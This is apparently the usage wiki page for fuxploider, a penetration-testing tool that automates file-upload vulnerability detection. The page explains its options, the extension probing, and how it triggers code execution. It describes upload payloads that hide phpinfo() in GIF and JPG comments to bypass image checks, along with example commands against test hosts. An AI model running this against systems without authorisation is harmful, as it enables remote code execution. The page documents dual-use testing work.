Skip to content
Virgile Jarry edited this page Sep 17, 2018 · 10 revisions

Usage

usage: fuxploider.py [-h] [-d postData] [--proxy proxyUrl]
                 [--proxy-creds [credentials]] [-f integer]
                 [--cookies omnomnom] [--uploads-path path]
                 [-t templateName] [-r regex] -u target
                 [--not-regex regex] [--true-regex regex]
                 [-l listOfExtensions | -n n] [-v | -vv | -vvv] [-s] [-y]
                 [-T Threads] [-U useragent | --random-user-agent] [-m]
                 [--input-name image] [--form-action upload.php]

optional arguments:
  -h, --help            show this help message and exit
  -d postData, --data postData
                    Additionnal data to be transmitted via POST method. Example : -d "key1=value1&key2=value2"
  --proxy proxyUrl      Proxy information. Example : --proxy "user:password@proxy.host:8080"
  --proxy-creds [credentials]
                    Prompt for proxy credentials at runtime. Format : 'user:pass'
  -f integer, --filesize integer
                    File size to use for files to be created and uploaded (in kB).
  --cookies omnomnom    Cookies to use with HTTP requests. Example : PHPSESSID=aef45aef45afeaef45aef45&JSESSID=AQSEJHQSQSG
  --uploads-path path   Path on the remote server where uploads are put. Example : '/tmp/uploads/'
  -t templateName, --template templateName
                    Malicious payload to use for code execution detection. Default is to use every known templates. For a complete list of templates, see the TEMPLATE section.
  -r regex, --regex-override regex
                    Specify a regular expression to detect code execution. Overrides the default code execution detection regex defined in the template in use.
  -l listOfExtensions, --legit-extensions listOfExtensions
                    Legit extensions expected, for a normal use of the form, comma separated. Example : 'jpg,png,bmp'
  -n n                  Number of common extensions to use. Example : -n 100
  -v                    Verbose mode
  -vv                   Very verbose mode
  -vvv                  Much verbose, very log, wow.
  -s, --skip-recon      Skip recon phase, where fuxploider tries to determine what extensions are expected and filtered by the server. Needs -l switch.
  -y                    Force detection of every entry points. Will not stop at first code exec found.
  -T Threads, --threads Threads
                    Number of parallel tasks (threads).
  -U useragent, --user-agent useragent
                    User-agent to use while requesting the target.
  --random-user-agent   Use a random user-agent while requesting the target.

Required named arguments:
  -u target, --url target
                    Web page URL containing the file upload form to be tested. Example : http://test.com/index.html?action=upload
  --not-regex regex     Regex matching an upload failure
  --true-regex regex    Regex matching an upload success

Manual Form Detection arguments:
  -m, --manual-form-detection
                    Disable automatic form detection. Useful when automatic detection fails due to: (1) Form loaded using Javascript (2) Multiple file upload forms in URL.
  --input-name image    Name of input for file. Example: <input type="file" name="image">
  --form-action upload.php
                    Path of form action. Example: <form method="POST" action="upload.php">

[TEMPLATES]
Templates are malicious payloads meant to be uploaded on the scanned remote server. Code execution detection is done based on the expected output of the payload.
Default templates are the following (name - description) : 
  * 'phpinfo' - Basic php file (plain text) with simple call to phpinfo().
  * 'nastygif' - Valid GIF file with basic call to phpinfo() in the comments section of the file
  * 'nastyjpg' - Valid JPG file with basic call to phpinfo() in the comments section of the file
  * 'basicjsp' - Basic jsp file with simple mathematical expression.

Output verbosity

Options : -v -vv -vvv

These options can be used to set the verbosity levels. There are four verbosity levels, the default level is 0, where info, warning error and critical messages are displayed along with python traceback if any.

  • 0 : Shows info messages, displaying information on successful exploitation of vulnerabilities.
  • 1 : Shows debug messages, displaying information on what fuxploider attempted to exploit vulnerabilities, event if it failed
  • 2 : Displays HTTP response headers for each HTTP request sent by fuxploider
  • 3 : Also displays HTTP response text/content from the tested server, along with headers

Target manipulation

Options : -u --not-regex --true-regex -s -l -r --uploads-path --cookies -f -d

Mandatory options for target specification are --url, --not-regex and --true-regex. At least one detection regex must be specified, either the true or the not regex, both can be used together.

Target specification

Option : -u, --url The provided url is expected to be one displaying a file upload form, not the final destination of the form itself.

Example : fuxploider --url http://127.0.0.1/dvfu/vulnerabilities/fu4.php --not-regex "Sorry"

The provided url contains a file upload form, displayed for the users to send files. The action field of the form can be anything, fuxploider will try to detect it and use it without having to specify it. In some cases, fuxploider will not be able to detect the upload form (the form may be loaded dynamically via javascript, there may be several upload forms or several file inputs in the same form). In these cases, you can override the detection mechanism of fuxploider, using the manual form detection options.

Manual form detection

Options : -m, --manual-form-detection, --input-name, --form-action

-m, --manual-form-detection : Used to disable automatic form detection and to enable manual detection.

--input-name name : The value of the "name" attribute of the chosen file input to use. Example : For the following input : <input type="file" name="uploadedfile" />, you will use --input-name "uploadedfile".

--form-action action : The value of the "action" attribute of the chosen form to use. Example: For the following form : <form method="POST" action="upload.php">, you will use --form-action "upload.php"

Valid extensions detection

Options : -n,-l,-s

Prior to any malicious file uploads, fuxploider detects what kind of extensions are supposed to be accepted by the file upload form (sending randomly generated, fixed sized files, along with any extension).

-n argument : The number of requests used to detect the extensions that are accepted can be significant. By default, the 100 most common extensions are tested. If you want to test for the n "most common" extensions, the -n switch can be used :

fuxploider --url http://anurl.domain/upload.php --not-regex "error" -n 50

In the previous example, only the 50 most common extensions will be tried.

-l argument : Fuxploider is also able to manage extensions provided at command line. To do this, the -l switch must be used :

fuxploider --url http://anurl.domain/upload.php --not-regex "error" -l "gif,jpeg,png,bmp"

In the previous example, fuxploider doesn't use the default list of "common" extensions, and use the ones provided at the command line instead : gif, jpeg, png and bmp. The extensions are still tested. The extensions provided through the use of the -l option must be known by fuxploider (to infere the associated mime type). If an unidentified extension is detected, the user is warned and the extension is not used.

-s switch : If you want to fully avoid the process of detecting what kind of file is expected by the server (because you already know for example), the -s switch can be used, along with the -l argument. Given a list of extensions supposed to be accepted, fuxploider will attempt to upload the payloads without checking that the given extensions are realy accepted by the server.

Successful uploads detection

Option : --true-regex, --not-regex

The true regex is meant to match a file upload success, while the not regex is expected to match a file upload failure. It can be any valid regex as of defined by the standard re package of python3.

The main thing to consider when choosing between using a true regex or a not regex is the eventual code execution detection we want. If only the not regex is specified, without any other switch, code execution detection is not possible. On the other hand, code execution detection is possible through the use of the true regex.

The main goal is to have a regex matching the url to request in order to trigger code execution. For example, if the server responds displaying a link, even a partial/relative one, we can use the true regex to match it and be able to automatically request it. The response is then parsed to detect code execution depending on the template in use (more information in the templates section). The part of the matching text we want to use in the code execution triggering http request must be put in the first capturing group of the true regex.

Trigger code execution

Option : --true-regex, --uploads-path

When an upload looks successful according the the not/true regex argument, fuxploider can try to trigger code execution to fully detect a valid entry point in the system. To do this, fuxploider needs to know where the uploaded file is on the server.

There are two ways to tell fuxploider where the uploaded files are put.

Uploads are put in a directly accessible directory

The easy way : when the server puts the file directly in a folder, accessible through GET requests, you can use the --uploads-path switch, specifying the absolute path to the uploads folder :

--uploads-path /dvfu/vulnerabilities/uploads/

If the file malicious.gif seems successfully uploaded, fuxploider will then attempt to access http://127.0.0.1/dvfu/vulnerabilities/uploads/malicious.gif and parse the response to detect code execution.

Uploads are not directly accessible

The other way : when the server renames the files or put them in a dynamically named directory (not guessable). Fuxploider can still use what is matched by the true regex to use it in the next request, to trigger code execution.

Let's say that the servers put the uploaded files in a folder named randomly. To access the file, the response will have to contain the path to the file. Use it in the true regex !

fuxploider --url http://127.0.0.1/dvfu/vulnerabilities/fu4.php --true-regex "\<a href=\'(.+?)\'\>File uploaded\<\/a\>"

In the previous example, the capturing group captures the url returned by the server to access the uploaded file. Fuxploider can use this url to trigger code execution (or at least to try). When using the true regex option without the --uploads-path option (when you don't have access directly to the uploads in a folder, but must match an url on the returned page), fuxploider will ask if you want to add a preffix or a suffix to the matched text.

[*] starting at 10:10:42
No uploads path provided, code detection can still be done using true regex capturing group.
Do you want to use the True Regex for code execution detection ? [Y/n] Y
Preffix capturing group of the true regex with : http://127.0.0.1/dvfu/vulnerabilities/
Suffix capturing group of the true regex with :

This way, if the link to the upload is only a relative path, you can still add the static part of it, before and/or after the dynamically matched path.


Proxy specification

Options --proxy, --proxy-creds

Fuxploider uses Requests default proxy handling system. If a proxy must be used, specify its url with the --proxy argument.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --proxy http://muchproxy.host:3128

If credentials must be used to access the proxy, you can use the --proxy-creds switch, either specifying the credentials at the command line or alone. If you specify the credentials on the command line, they will be used as it is, else, you will be prompted at runtime to write them down.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --proxy http://muchproxy.host:3128    /
    --proxy-creds "user:pass"
[*] Starting at 10:10:42
...

--proxy http://muchproxy.host:3128 --proxy-creds
Proxy username : almandin
Proxy password : 
[*] starting at 10:10:42
...

Server specific additional information

POST data

Option : --data

Many file upload forms ask for additional information while uploading the file (an email, a name or anything). You can provide such additional information using the --data argument :

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --data 'email=test@ab.com&name=almandin'

These post parameters will be added every time while uploading the files.

Cookies

Option : --cookies

Cookies can be provided using the --cookies argument, to specify a session id or anything else :

fuxploider --url http://anurl.domain/upload.php --not-regex "error"     /
    --cookies 'PHPSESSID=9a26a89f8c881afbd7638c62c39e5610'

File size

Option : --filesize

When forms are asking for a minimal file size, the --filesize option can be used to specify the size of the files that will be used when detecting accepted extensions. The expected integer is in KB.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --filesize 250

When used while skipping valid extensions detection (-s switch), -f/--filesize switch has no effect.


Templates/Payloads

Options -t, -r

Several payloads are defined in fuxploider to allow detection of code execution through different techniques (for instance, a basic php file is present, along with a gif and jpeg template to detect code execution by bypassing getimagesize checks).

-t argument : The -t argument can be used to specify the payload we want to use in particular. Otherwise, every templates are used.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --template phpinfo

In the previous example, only the template named phpinfo is used. As this payload is only a plain/text file, no checks will be done to bypass getimagesize like checks.

-r argument : The -r argument can be used to override the way fuxploider detects code execution on successful uploads. By default, each template/payload has its own regular expression to detect if code execution is performed. This regular expression can be overridden. For instance, the phpinfo template uses a regex that matches a basic phpinfo() call.


Miscellaneous

-T argument : Specifies the number of threads to use for parallel HTTP requests.

-U argument : Used to specify a user-agent. Example : -U "myAwesomeUser-Agent"

--random-user-agent : Used to specify a random user agent (based on a plain text list). This random user-agent will be used for every request.

Fuxploider wiki pages


Clone this wiki locally